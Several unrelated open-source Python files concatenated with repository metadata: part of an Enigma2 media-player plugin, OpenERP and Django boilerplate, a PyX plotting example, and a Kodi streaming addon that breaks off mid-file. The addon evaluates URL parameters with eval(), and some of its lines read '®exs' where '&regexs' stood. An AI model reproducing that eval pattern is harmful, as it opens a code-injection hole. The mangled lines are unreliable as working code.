if not self.shown and self.isPiPzap():
slist = self.servicelist
if slist.inBouquet():
prev = slist.getCurrentSelection()
if prev:
prev = prev.toString()
while True:
if config.usage.quickzap_bouquet_change.value and slist.atEnd():
slist.nextBouquet()
else:
slist.moveDown()
cur = slist.getCurrentSelection()
if not cur or (not (cur.flags & 64)) or cur.toString() == prev:
break
else:
slist.moveDown()
slist.zap(enable_pipzap = True)
else:
if self.currList == "filelist":
self.switchToPlayList()
else:
self.switchToFileList()
def prevBouquet(self):
if not self.shown and self.isPiPzap():
slist = self.servicelist
if slist.inBouquet():
prev = slist.getCurrentSelection()
if prev:
prev = prev.toString()
while True:
if config.usage.quickzap_bouquet_change.value:
if slist.atBegin():
slist.prevBouquet()
slist.moveUp()
cur = slist.getCurrentSelection()
if not cur or (not (cur.flags & 64)) or cur.toString() == prev:
break
else:
slist.moveUp()
slist.zap(enable_pipzap = True)
else:
if self.currList == "filelist":
self.switchToPlayList()
else:
self.switchToFileList()
class MediaPlayerLCDScreen(Screen):
skin = (
"""<screen name="MediaPlayerLCDScreen" position="0,0" size="132,64" id="1">
<widget name="text1" position="4,0" size="132,35" font="Regular;16"/>
<widget name="text3" position="4,36" size="132,14" font="Regular;10"/>
<widget name="text4" position="4,49" size="132,14" font="Regular;10"/>
</screen>""",
"""<screen name="MediaPlayerLCDScreen" position="0,0" size="96,64" id="2">
<widget name="text1" position="0,0" size="96,35" font="Regular;14"/>
<widget name="text3" position="0,36" size="96,14" font="Regular;10"/>
<widget name="text4" position="0,49" size="96,14" font="Regular;10"/>
</screen>""")
def __init__(self, session, parent):
Screen.__init__(self, session)
self["text1"] = Label("Media player")
self["text3"] = Label("")
self["text4"] = Label("")
def setText(self, text, line):
if len(text) > 10:
if text[-4:] == ".mp3":
text = text[:-4]
textleer = " "
text = text + textleer*10
if line == 1:
self["text1"].setText(text)
elif line == 3:
self["text3"].setText(text)
elif line == 4:
self["text4"].setText(text)
def mainCheckTimeshiftCallback(session, answer):
if answer:
session.open(MediaPlayer)
def main(session, **kwargs):
InfoBar.instance.checkTimeshiftRunning(boundFunction(mainCheckTimeshiftCallback, session))
def menu(menuid, **kwargs):
if menuid == "mainmenu" and config.mediaplayer.onMainMenu.getValue():
return [(_("Media player"), main, "media_player", 45)]
return []
def filescan_open(list, session, **kwargs):
from enigma import eServiceReference
mp = session.open(MediaPlayer)
mp.playlist.clear()
mp.savePlaylistOnExit = False
for file in list:
if file.mimetype == "video/mp2t":
stype = 1
else:
stype = 4097
ref = eServiceReference(stype, 0, file.path)
mp.playlist.addFile(ref)
mp.changeEntry(0)
mp.switchToPlayList()
def audioCD_open(list, session, **kwargs):
from enigma import eServiceReference
if os.path.isfile('/media/audiocd/cdplaylist.cdpls'):
list = open("/media/audiocd/cdplaylist.cdpls")
else:
# to do : adding msgbox to inform user about failure of opening audiocd.
return False
mp = session.open(MediaPlayer)
if list:
mp.isAudioCD = True
for x in list:
xnon = x.replace("\n", "")
mp.cdAudioTrackFiles.append(xnon)
mp.playAudioCD()
else:
# to do : adding msgbox to inform user about failure of opening audiocd.
return False
def audioCD_open_mn(session, **kwargs):
from enigma import eServiceReference
if os.path.isfile('/media/audiocd/cdplaylist.cdpls'):
list = open("/media/audiocd/cdplaylist.cdpls")
else:
# to do : adding msgbox to inform user about failure of opening audiocd.
return False
mp = session.open(MediaPlayer)
if list:
mp.isAudioCD = True
for x in list:
xnon = x.replace("\n", "")
mp.cdAudioTrackFiles.append(xnon)
mp.playAudioCD()
else:
# to do : adding msgbox to inform user about failure of opening audiocd.
return False
def movielist_open(list, session, **kwargs):
if not list:
# sanity
return
from enigma import eServiceReference
from Screens.InfoBar import InfoBar
f = list[0]
if f.mimetype == "video/mp2t":
stype = 1
else:
stype = 4097
if InfoBar.instance:
path = os.path.split(f.path)[0]
if not path.endswith('/'):
path += '/'
config.movielist.last_videodir.value = path
InfoBar.instance.showMovies(eServiceReference(stype, 0, f.path))
def audiocdscan(menuid, **kwargs):
try:
from Plugins.SystemPlugins.Hotplug.plugin import AudiocdAdded
except Exception, e:
print "[Mediaplayer.plugin] no hotplug support",e
return []
if menuid == "mainmenu" and AudiocdAdded() and os.path.isfile('/media/audiocd/cdplaylist.cdpls'):
return [(_("Play audio-CD..."), audioCD_open_mn, "play_cd", 45)]
else:
return []
def filescan(**kwargs):
from Components.Scanner import Scanner, ScanPath
return [
Scanner(mimetypes = ["video/mpeg", "video/mp2t", "video/x-msvideo", "video/mkv", "video/x-ms-wmv", "video/x-matroska", "video/ogg", "video/dvd", "video/mp4", "video/avi", "video/divx", "video/x-mpeg", "video/x-flv", "video/quicktime", "video/x-ms-asf", "video/3gpp", "video/3gpp2", "application/vnd.rn-realmedia", "application/vnd.rn-realmedia-vbr", "video/mts"],
paths_to_scan =
[
ScanPath(path = "", with_subdirs = False),
ScanPath(path = "PRIVATE/AVCHD/BDMV/STREAM", with_subdirs = False),
],
name = "Movie",
description = _("Watch movies..."),
openfnc = movielist_open,
),
Scanner(mimetypes = ["video/x-vcd"],
paths_to_scan =
[
ScanPath(path = "mpegav", with_subdirs = False),
ScanPath(path = "MPEGAV", with_subdirs = False),
],
name = "Video CD",
description = _("View video CD..."),
openfnc = filescan_open,
),
Scanner(mimetypes = ["audio/mpeg", "audio/x-wav", "audio/dts", "audio/ogg", "audio/flac", "audio/mp4", "audio/x-ms-wma", "audio/ac3", "audio/x-matroska", "audio/x-aac", "audio/x-monkeys-audio"],
paths_to_scan =
[
ScanPath(path = "", with_subdirs = False),
],
name = "Music",
description = _("Play music..."),
openfnc = filescan_open,
),
Scanner(mimetypes = ["audio/x-cda"],
paths_to_scan =
[
ScanPath(path = "", with_subdirs = False),
],
name = "Audio-CD",
description = _("Play audio-CD..."),
openfnc = audioCD_open,
),
]
from Plugins.Plugin import PluginDescriptor
def Plugins(**kwargs):
return [
PluginDescriptor(name = _("Media player"), description = _("Play back media files"), where = PluginDescriptor.WHERE_PLUGINMENU, icon="MediaPlayer.png", needsRestart = False, fnc = main),
PluginDescriptor(name = _("Media player"), where = PluginDescriptor.WHERE_FILESCAN, needsRestart = False, fnc = filescan),
PluginDescriptor(name = _("Media player"), where = PluginDescriptor.WHERE_MENU, needsRestart = False, fnc = audiocdscan),
PluginDescriptor(name = _("Media player"), description = _("Play back media files"), where = PluginDescriptor.WHERE_MENU, needsRestart = False, fnc = menu)
]
|
Antonio-Team/enigma2
|
lib/python/Plugins/Extensions/MediaPlayer/plugin.py
|
Python
|
gpl-2.0
| 43,557
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
###############################################################################
# Module Writen to OpenERP, Open Source Management Solution
# Copyright (C) OpenERP Venezuela (<http://www.vauxoo.com>).
# All Rights Reserved
############# Credits #########################################################
# Coded by: Katherine Zaoral <kathy@vauxoo.com>
# Planified by: Katherine Zaoral <kathy@vauxoo.com>
# Audited by: Humberto Arocha <hbto@vauxoo.com>
###############################################################################
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
###############################################################################
import mrp_product_capacity
|
3dfxsoftware/cbss-addons
|
mrp_product_capacity/model/__init__.py
|
Python
|
gpl-2.0
| 1,386
|
"""
WSGI config for rentv project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "rentv.settings")
application = get_wsgi_application()
|
icewind666/pythonsamples
|
rentv/rentv/wsgi.py
|
Python
|
gpl-2.0
| 387
|
import math
from pyx import *
from pyx.graph import axis
# we here use parters and texters which are explained in the examples below
log2parter = axis.parter.log([axis.parter.preexp([axis.tick.rational(1)], 4),
axis.parter.preexp([axis.tick.rational(1)], 2)])
log2texter = axis.texter.exponential(nomantissaexp=r"{2^{%s}}",
mantissamax=axis.tick.rational(2))
g = graph.graphxy(width=10,
x=axis.log(min=1, max=1024),
y=axis.log(min=1, max=1024, parter=log2parter),
y2=axis.log(min=1, max=1024, parter=log2parter, texter=log2texter))
g.writeEPSfile("log")
g.writePDFfile("log")
g.writeSVGfile("log")
|
mjg/PyX
|
examples/axis/log.py
|
Python
|
gpl-2.0
| 680
|
# -*- coding: utf-8 -*-
import urllib
import urllib2
import datetime
import re
import os
import xbmcplugin
import xbmcgui
import xbmcaddon
import xbmcvfs
from BeautifulSoup import BeautifulStoneSoup, BeautifulSoup, BeautifulSOAP
try:
import json
except:
import simplejson as json
import SimpleDownloader as downloader
addon = xbmcaddon.Addon('plugin.video.live.streaming')
addon_version = addon.getAddonInfo('version')
profile = xbmc.translatePath(addon.getAddonInfo('profile').decode('utf-8'))
home = xbmc.translatePath(addon.getAddonInfo('path').decode('utf-8'))
favorites = os.path.join(profile, 'favorites')
REV = os.path.join(profile, 'list_revision')
icon = os.path.join(home, 'icon.png')
FANART = os.path.join(home, 'fanart.jpg')
source_file = os.path.join(profile, 'source_file')
downloader = downloader.SimpleDownloader()
debug = addon.getSetting('debug')
if os.path.exists(favorites)==True:
FAV = open(favorites).read()
else: FAV = []
if os.path.exists(source_file)==True:
SOURCES = open(source_file).read()
else: SOURCES = []
def addon_log(string):
if debug == 'true':
xbmc.log("[addon.live.streaming-%s]: %s" %(addon_version, string))
def makeRequest(url, headers=None):
try:
if headers is None:
headers = {'User-agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0'}
req = urllib2.Request(url,None,headers)
response = urllib2.urlopen(req)
data = response.read()
response.close()
return data
except urllib2.URLError, e:
addon_log('URL: '+url)
if hasattr(e, 'code'):
addon_log('We failed with error code - %s.' % e.code)
xbmc.executebuiltin("XBMC.Notification(Easystreams,We failed with error code - "+str(e.code)+",10000,"+icon+")")
elif hasattr(e, 'reason'):
addon_log('We failed to reach a server.')
addon_log('Reason: %s' %e.reason)
xbmc.executebuiltin("XBMC.Notification(Easystreams,We failed to reach a server. - "+str(e.reason)+",10000,"+icon+")")
def getSources():
if os.path.exists(favorites) == True:
addDir('Favorites','url',4,os.path.join(home, 'resources', 'favorite.png'),FANART,'','','','')
if addon.getSetting("browse_xml_database") == "true":
addDir('XML Database','http://xbmcplus.xb.funpic.de/www-data/filesystem/',15,icon,FANART,'','','','')
if addon.getSetting("browse_community") == "true":
addDir('Easystream Files','community_files',16,icon,FANART,'','','','')
if os.path.exists(source_file)==True:
sources = json.loads(open(source_file,"r").read())
if len(sources) > 1:
for i in sources:
## for pre 1.0.8 sources
if isinstance(i, list):
addDir(i[0].encode('utf-8'),i[1].encode('utf-8'),1,icon,FANART,'','','','','source')
else:
thumb = icon
fanart = FANART
desc = ''
date = ''
credits = ''
genre = ''
if i.has_key('thumbnail'):
thumb = i['thumbnail']
if i.has_key('fanart'):
fanart = i['fanart']
if i.has_key('description'):
desc = i['description']
if i.has_key('date'):
date = i['date']
if i.has_key('genre'):
genre = i['genre']
if i.has_key('credits'):
credits = i['credits']
addDir(i['title'].encode('utf-8'),i['url'].encode('utf-8'),1,thumb,fanart,desc,genre,date,credits,'source')
else:
if len(sources) == 1:
if isinstance(sources[0], list):
getData(sources[0][1].encode('utf-8'),FANART)
else:
getData(sources[0]['url'], sources[0]['fanart'])
def addSource(url=None):
if url is None:
if not addon.getSetting("new_file_source") == "":
source_url = addon.getSetting('new_file_source').decode('utf-8')
elif not addon.getSetting("new_url_source") == "":
source_url = addon.getSetting('new_url_source').decode('utf-8')
else:
source_url = url
if source_url == '' or source_url is None:
return
addon_log('Adding New Source: '+source_url.encode('utf-8'))
media_info = None
data = getSoup(source_url)
if data.find('channels_info'):
media_info = data.channels_info
elif data.find('items_info'):
media_info = data.items_info
if media_info:
source_media = {}
source_media['url'] = source_url
try: source_media['title'] = media_info.title.string
except: pass
try: source_media['thumbnail'] = media_info.thumbnail.string
except: pass
try: source_media['fanart'] = media_info.fanart.string
except: pass
try: source_media['genre'] = media_info.genre.string
except: pass
try: source_media['description'] = media_info.description.string
except: pass
try: source_media['date'] = media_info.date.string
except: pass
try: source_media['credits'] = media_info.credits.string
except: pass
else:
if '/' in source_url:
nameStr = source_url.split('/')[-1].split('.')[0]
if '\\' in source_url:
nameStr = source_url.split('\\')[-1].split('.')[0]
if '%' in nameStr:
nameStr = urllib.unquote_plus(nameStr)
keyboard = xbmc.Keyboard(nameStr,'Displayed Name, Rename?')
keyboard.doModal()
if (keyboard.isConfirmed() == False):
return
newStr = keyboard.getText()
if len(newStr) == 0:
return
source_media = {}
source_media['title'] = newStr
source_media['url'] = source_url
source_media['fanart'] = fanart
if os.path.exists(source_file)==False:
source_list = []
source_list.append(source_media)
b = open(source_file,"w")
b.write(json.dumps(source_list))
b.close()
else:
sources = json.loads(open(source_file,"r").read())
sources.append(source_media)
b = open(source_file,"w")
b.write(json.dumps(sources))
b.close()
addon.setSetting('new_url_source', "")
addon.setSetting('new_file_source', "")
xbmc.executebuiltin("XBMC.Notification(Easystreams,New source added.,5000,"+icon+")")
if not url is None:
if 'xbmcplus.xb.funpic.de' in url:
xbmc.executebuiltin("XBMC.Container.Update(%s?mode=14,replace)" %sys.argv[0])
elif 'community-links' in url:
xbmc.executebuiltin("XBMC.Container.Update(%s?mode=10,replace)" %sys.argv[0])
else: addon.openSettings()
def rmSource(name):
sources = json.loads(open(source_file,"r").read())
for index in range(len(sources)):
if isinstance(sources[index], list):
if sources[index][0] == name:
del sources[index]
b = open(source_file,"w")
b.write(json.dumps(sources))
b.close()
break
else:
if sources[index]['title'] == name:
del sources[index]
b = open(source_file,"w")
b.write(json.dumps(sources))
b.close()
break
xbmc.executebuiltin("XBMC.Container.Refresh")
def get_xml_database(url, browse=False):
if url is None:
url = 'http://xbmcplus.xb.funpic.de/www-data/filesystem/'
soup = BeautifulSoup(makeRequest(url), convertEntities=BeautifulSoup.HTML_ENTITIES)
for i in soup('a'):
href = i['href']
if not href.startswith('?'):
name = i.string
if name not in ['Parent Directory', 'recycle_bin/']:
if href.endswith('/'):
if browse:
addDir(name,url+href,15,icon,fanart,'','','')
else:
addDir(name,url+href,14,icon,fanart,'','','')
elif href.endswith('.xml'):
if browse:
addDir(name,url+href,1,icon,fanart,'','','','','download')
else:
if os.path.exists(source_file)==True:
if name in SOURCES:
addDir(name+' (in use)',url+href,11,icon,fanart,'','','','','download')
else:
addDir(name,url+href,11,icon,fanart,'','','','','download')
else:
addDir(name,url+href,11,icon,fanart,'','','','','download')
def getCommunitySources(browse=False):
url = 'http://github.com/easystreams2/'
soup = BeautifulSoup(makeRequest(url), convertEntities=BeautifulSoup.HTML_ENTITIES)
files = soup('ul')[0]('li')[1:]
for i in files:
name = i('a')[0]['href']
if browse:
addDir(name,url+name,1,icon,fanart,'','','','','download')
else:
addDir(name,url+name,11,icon,fanart,'','','','','download')
def getSoup(url):
if url.startswith('http://'):
data = makeRequest(url)
else:
if xbmcvfs.exists(url):
if url.startswith("smb://") or url.startswith("nfs://"):
copy = xbmcvfs.copy(url, os.path.join(profile, 'temp', 'sorce_temp.txt'))
if copy:
data = open(os.path.join(profile, 'temp', 'sorce_temp.txt'), "r").read()
xbmcvfs.delete(os.path.join(profile, 'temp', 'sorce_temp.txt'))
else:
addon_log("failed to copy from smb:")
else:
data = open(url, 'r').read()
else:
addon_log("Soup Data not found!")
return
return BeautifulSOAP(data, convertEntities=BeautifulStoneSoup.XML_ENTITIES)
def getData(url,fanart):
soup = getSoup(url)
if len(soup('channels')) > 0:
channels = soup('channel')
for channel in channels:
name = channel('name')[0].string
thumbnail = channel('thumbnail')[0].string
if thumbnail == None:
thumbnail = ''
try:
if not channel('fanart'):
if addon.getSetting('use_thumb') == "true":
fanArt = thumbnail
else:
fanArt = fanart
else:
fanArt = channel('fanart')[0].string
if fanArt == None:
raise
except:
fanArt = fanart
try:
desc = channel('info')[0].string
if desc == None:
raise
except:
desc = ''
try:
genre = channel('genre')[0].string
if genre == None:
raise
except:
genre = ''
try:
date = channel('date')[0].string
if date == None:
raise
except:
date = ''
try:
credits = channel('credits')[0].string
if credits == None:
raise
except:
credits = ''
try:
addDir(name.encode('utf-8', 'ignore'),url.encode('utf-8'),2,thumbnail,fanArt,desc,genre,date,credits,True)
except:
addon_log('There was a problem adding directory from getData(): '+name.encode('utf-8', 'ignore'))
else:
addon_log('No Channels: getItems')
getItems(soup('item'),fanart)
def getChannelItems(name,url,fanart):
soup = getSoup(url)
channel_list = soup.find('channel', attrs={'name' : name.decode('utf-8')})
items = channel_list('item')
try:
fanArt = channel_list('fanart')[0].string
if fanArt == None:
raise
except:
fanArt = fanart
for channel in channel_list('subchannel'):
name = channel('name')[0].string
try:
thumbnail = channel('thumbnail')[0].string
if thumbnail == None:
raise
except:
thumbnail = ''
try:
if not channel('fanart'):
if addon.getSetting('use_thumb') == "true":
fanArt = thumbnail
else:
fanArt = channel('fanart')[0].string
if fanArt == None:
raise
except:
pass
try:
desc = channel('info')[0].string
if desc == None:
raise
except:
desc = ''
try:
genre = channel('genre')[0].string
if genre == None:
raise
except:
genre = ''
try:
date = channel('date')[0].string
if date == None:
raise
except:
date = ''
try:
credits = channel('credits')[0].string
if credits == None:
raise
except:
credits = ''
try:
addDir(name.encode('utf-8', 'ignore'),url.encode('utf-8'),3,thumbnail,fanArt,desc,genre,credits,date)
except:
addon_log('There was a problem adding directory - '+name.encode('utf-8', 'ignore'))
getItems(items,fanArt)
def getSubChannelItems(name,url,fanart):
soup = getSoup(url)
channel_list = soup.find('subchannel', attrs={'name' : name.decode('utf-8')})
items = channel_list('subitem')
getItems(items,fanart)
def getItems(items,fanart):
total = len(items)
addon_log('Total Items: %s' %total)
for item in items:
try:
name = item('title')[0].string
if name is None:
name = 'unknown?'
except:
addon_log('Name Error')
name = ''
try:
if item('epg'):
if item.epg_url:
addon_log('Get EPG Regex')
epg_url = item.epg_url.string
epg_regex = item.epg_regex.string
epg_name = get_epg(epg_url, epg_regex)
if epg_name:
name += ' - ' + epg_name
elif item('epg')[0].string > 1:
name += getepg(item('epg')[0].string)
else:
pass
except:
addon_log('EPG Error')
try:
url = []
for i in item('link'):
if not i.string == None:
url.append(i.string)
if len(url) < 1:
raise
except:
addon_log('Error <link> element, Passing:'+name.encode('utf-8', 'ignore'))
continue
try:
thumbnail = item('thumbnail')[0].string
if thumbnail == None:
raise
except:
thumbnail = ''
try:
if not item('fanart'):
if addon.getSetting('use_thumb') == "true":
fanArt = thumbnail
else:
fanArt = fanart
else:
fanArt = item('fanart')[0].string
if fanArt == None:
raise
except:
fanArt = fanart
try:
desc = item('info')[0].string
if desc == None:
raise
except:
desc = ''
try:
genre = item('genre')[0].string
if genre == None:
raise
except:
genre = ''
try:
date = item('date')[0].string
if date == None:
raise
except:
date = ''
regexs = None
if item('regex'):
try:
regexs = {}
for i in item('regex'):
regexs[i('name')[0].string] = {}
regexs[i('name')[0].string]['expre'] = i('expres')[0].string
regexs[i('name')[0].string]['page'] = i('page')[0].string
try:
regexs[i('name')[0].string]['refer'] = i('referer')[0].string
except:
addon_log("Regex: -- No Referer --")
try:
regexs[i('name')[0].string]['agent'] = i('agent')[0].string
except:
addon_log("Regex: -- No User Agent --")
try:
regexs[i('name')[0].string]['data'] = i('data')[0].string
except:
addon_log("Regex: -- No data --")
try:
regexs[i('name')[0].string]['function'] = i('function')[0].string
except:
addon_log("Regex: -- No function --")
regexs = urllib.quote(repr(regexs))
except:
regexs = None
addon_log('regex Error: '+name.encode('utf-8', 'ignore'))
try:
if len(url) > 1:
alt = 0
playlist = []
for i in url:
playlist.append(i)
if addon.getSetting('add_playlist') == "false":
for i in url:
alt += 1
addLink(i,'%s) %s' %(alt, name.encode('utf-8', 'ignore')),thumbnail,fanArt,desc,genre,date,True,playlist,regexs,total)
else:
addLink('', name.encode('utf-8', 'ignore'),thumbnail,fanArt,desc,genre,date,True,playlist,regexs,total)
else:
addLink(url[0],name.encode('utf-8', 'ignore'),thumbnail,fanArt,desc,genre,date,True,None,regexs,total)
except:
addon_log('There was a problem adding item - '+name.encode('utf-8', 'ignore'))
def getRegexParsed(regexs, url):
regexs = eval(urllib.unquote(regexs))
cachedPages = {}
doRegexs = re.compile('\$doregex\[([^\]]*)\]').findall(url)
for k in doRegexs:
if k in regexs:
m = regexs[k]
if m['page'] in cachedPages:
link = cachedPages[m['page']]
else:
addon_log('get regexs: %s' %m['page'])
req = urllib2.Request(m['page'])
req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1')
if 'refer' in m:
req.add_header('Referer', m['refer'])
if 'agent' in m:
req.add_header('User-agent', m['agent'])
if 'data' in m:
req.add_data(m['data'])
if m.has_key('function') and m['function'] == 'NoRedirection':
addon_log('regex function NoRedirection')
opener = urllib2.build_opener(NoRedirection)
urllib2.install_opener(opener)
link = urllib2.urlopen(req)
else:
response = urllib2.urlopen(req)
link = response.read()
response.close()
cachedPages[m['page']] = link
reg = re.compile(m['expre']).search(link)
data = reg.group(1).strip()
if m.has_key('function') and m['function'] == 'unquote':
data = urllib.unquote(data)
addon_log('Reg urllib.unquote(data): %s' %data)
addon_log('Reg data: %s' %data)
url = url.replace("$doregex[" + k + "]", data)
item = xbmcgui.ListItem(path=url)
xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, item)
class NoRedirection(urllib2.HTTPErrorProcessor):
def http_response(self, request, response):
return str(response.info())
def get_params():
param=[]
paramstring=sys.argv[2]
if len(paramstring)>=2:
params=sys.argv[2]
cleanedparams=params.replace('?','')
if (params[len(params)-1]=='/'):
params=params[0:len(params)-2]
pairsofparams=cleanedparams.split('&')
param={}
for i in range(len(pairsofparams)):
splitparams={}
splitparams=pairsofparams[i].split('=')
if (len(splitparams))==2:
param[splitparams[0]]=splitparams[1]
return param
def getFavorites():
items = json.loads(open(favorites).read())
total = len(items)
for i in items:
name = i[0]
url = i[1]
iconimage = i[2]
try:
fanArt = i[3]
if fanArt == None:
raise
except:
if addon.getSetting('use_thumb') == "true":
fanArt = iconimage
else:
fanArt = fanart
try: playlist = i[5]
except: playlist = None
try: regexs = i[6]
except: regexs = None
if i[4] == 0:
addLink(url,name,iconimage,fanArt,'','','','fav',playlist,regexs,total)
else:
addDir(name,url,i[4],iconimage,fanart,'','','','','fav')
def addFavorite(name,url,iconimage,fanart,mode,playlist=None,regexs=None):
favList = []
try:
# seems that after
name = name.encode('utf-8', 'ignore')
except:
pass
if os.path.exists(favorites)==False:
addon_log('Making Favorites File')
favList.append((name,url,iconimage,fanart,mode,playlist,regexs))
a = open(favorites, "w")
a.write(json.dumps(favList))
a.close()
else:
addon_log('Appending Favorites')
a = open(favorites).read()
data = json.loads(a)
data.append((name,url,iconimage,fanart,mode))
b = open(favorites, "w")
b.write(json.dumps(data))
b.close()
def rmFavorite(name):
data = json.loads(open(favorites).read())
for index in range(len(data)):
if data[index][0]==name:
del data[index]
b = open(favorites, "w")
b.write(json.dumps(data))
b.close()
break
xbmc.executebuiltin("XBMC.Container.Refresh")
def play_playlist(name, list):
playlist = xbmc.PlayList(1)
playlist.clear()
item = 0
for i in list:
item += 1
info = xbmcgui.ListItem('%s) %s' %(str(item),name))
playlist.add(i, info)
xbmc.executebuiltin('playlist.playoffset(video,0)')
def download_file(name, url):
if addon.getSetting('save_location') == "":
xbmc.executebuiltin("XBMC.Notification('Easystreams','Choose a location to save files.',15000,"+icon+")")
addon.openSettings()
params = {'url': url, 'download_path': addon.getSetting('save_location')}
downloader.download(name, params)
dialog = xbmcgui.Dialog()
ret = dialog.yesno('Easystreams', 'Do you want to add this file as a source?')
if ret:
addSource(os.path.join(addon.getSetting('save_location'), name))
def addDir(name,url,mode,iconimage,fanart,description,genre,date,credits,showcontext=False):
u=sys.argv[0]+"?url="+urllib.quote_plus(url)+"&mode="+str(mode)+"&name="+urllib.quote_plus(name)+"&fanart="+urllib.quote_plus(fanart)
ok=True
if date == '':
date = None
else:
description += '\n\nDate: %s' %date
liz=xbmcgui.ListItem(name, iconImage="DefaultFolder.png", thumbnailImage=iconimage)
liz.setInfo(type="Video", infoLabels={ "Title": name, "Plot": description, "Genre": genre, "dateadded": date, "credits": credits })
liz.setProperty("Fanart_Image", fanart)
if showcontext:
contextMenu = []
if showcontext == 'source':
if name in str(SOURCES):
contextMenu.append(('Remove from Sources','XBMC.RunPlugin(%s?mode=8&name=%s)' %(sys.argv[0], urllib.quote_plus(name))))
elif showcontext == 'download':
contextMenu.append(('Download','XBMC.RunPlugin(%s?url=%s&mode=9&name=%s)'
%(sys.argv[0], urllib.quote_plus(url), urllib.quote_plus(name))))
elif showcontext == 'fav':
contextMenu.append(('Remove from Easystreams Favorites','XBMC.RunPlugin(%s?mode=6&name=%s)'
%(sys.argv[0], urllib.quote_plus(name))))
if not name in FAV:
contextMenu.append(('Add to Easystreams Favorites','XBMC.RunPlugin(%s?mode=5&name=%s&url=%s&iconimage=%s&fanart=%s&fav_mode=%s)'
%(sys.argv[0], urllib.quote_plus(name), urllib.quote_plus(url), urllib.quote_plus(iconimage), urllib.quote_plus(fanart), mode)))
liz.addContextMenuItems(contextMenu)
ok=xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=liz,isFolder=True)
return ok
def addLink(url,name,iconimage,fanart,description,genre,date,showcontext,playlist,regexs,total):
try:
name = name.encode('utf-8')
except: pass
ok = True
if regexs: mode = '17'
else: mode = '12'
u=sys.argv[0]+"?"
play_list = False
if playlist:
if addon.getSetting('add_playlist') == "false":
u += "url="+urllib.quote_plus(url)+"&mode="+mode
else:
u += "mode=13&name=%s&playlist=%s" %(urllib.quote_plus(name), urllib.quote_plus(str(playlist).replace(',','|')))
play_list = True
else:
u += "url="+urllib.quote_plus(url)+"&mode="+mode
if regexs:
u += "®exs="+regexs
if date == '':
date = None
else:
description += '\n\nDate: %s' %date
liz=xbmcgui.ListItem(name, iconImage="DefaultVideo.png", thumbnailImage=iconimage)
liz.setInfo(type="Video", infoLabels={ "Title": name, "Plot": description, "Genre": genre, "dateadded": date })
liz.setProperty("Fanart_Image", fanart)
if not play_list:
liz.setProperty('IsPlayable', 'true')
if showcontext:
contextMenu = []
if showcontext == 'fav':
contextMenu.append(
('Remove from Easystreams Favorites','XBMC.RunPlugin(%s?mode=6&name=%s)'
%(sys.argv[0], urllib.quote_plus(name)))
)
elif not name in FAV:
fav_params = (
'%s?mode=5&name=%s&url=%s&iconimage=%s&fanart=%s&fav_mode=0'
%(sys.argv[0], urllib.quote_plus(name), urllib.quote_plus(url), urllib.quote_plus(iconimage), urllib.quote_plus(fanart))
)
if playlist:
fav_params += 'playlist='+urllib.quote_plus(str(playlist).replace(',','|'))
if regexs:
fav_params += "®exs="+regexs
contextMenu.append(('Add to Easystreams Favorites','XBMC.RunPlugin(%s)' %fav_params))
liz.addContextMenuItems(contextMenu)
if not playlist is None:
if addon.getSetting('add_playlist') == "false":
playlist_name = name.split(') ')[1]
contextMenu_ = [
('Play '+playlist_name+' PlayList','XBMC.RunPlugin(%s?mode=13&name=%s&playlist=%s)'
%(sys.argv[0], urllib.quote_plus(playlist_name), urllib.quote_plus(str(playlist).replace(',','|'))))
]
liz.addContextMenuItems(contextMenu_)
ok=xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=liz,totalItems=total)
return ok
## Thanks to daschacka, an epg scraper for http://i.teleboy.ch/programm/station_select.php
## http://forum.xbmc.org/showpost.php?p=936228&postcount=1076
def getepg(link):
url=urllib.urlopen(link)
source=url.read()
url.close()
source2 = source.split("Jetzt")
source3 = source2[1].split('programm/detail.php?const_id=')
sourceuhrzeit = source3[1].split('<br /><a href="/')
nowtime = sourceuhrzeit[0][40:len(sourceuhrzeit[0])]
sourcetitle = source3[2].split("</a></p></div>")
nowtitle = sourcetitle[0][17:len(sourcetitle[0])]
nowtitle = nowtitle.encode('utf-8')
return " - "+nowtitle+" - "+nowtime
def get_epg(url, regex):
data = makeRequest(url)
try:
item = re.findall(regex, data)[0]
return item
except:
addon_log('regex failed')
addon_log(regex)
return
xbmcplugin.setContent(int(sys.argv[1]), 'movies')
try:
xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_UNSORTED)
except:
pass
try:
xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_LABEL)
except:
pass
try:
xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_DATE)
except:
pass
try:
xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_GENRE)
except:
pass
params=get_params()
url=None
name=None
mode=None
playlist=None
iconimage=None
fanart=FANART
playlist=None
fav_mode=None
regexs=None
try:
url=urllib.unquote_plus(params["url"]).decode('utf-8')
except:
pass
try:
name=urllib.unquote_plus(params["name"])
except:
pass
try:
iconimage=urllib.unquote_plus(params["iconimage"])
except:
pass
try:
fanart=urllib.unquote_plus(params["fanart"])
except:
pass
try:
mode=int(params["mode"])
except:
pass
try:
playlist=eval(urllib.unquote_plus(params["playlist"]).replace('|',','))
except:
pass
try:
fav_mode=int(params["fav_mode"])
except:
pass
try:
regexs=params["regexs"]
except:
pass
addon_log("Mode: "+str(mode))
if not url is None:
addon_log("URL: "+str(url.encode('utf-8')))
addon_log("Name: "+str(name))
if mode==None:
addon_log("getSources")
getSources()
xbmcplugin.endOfDirectory(int(sys.argv[1]))
elif mode==1:
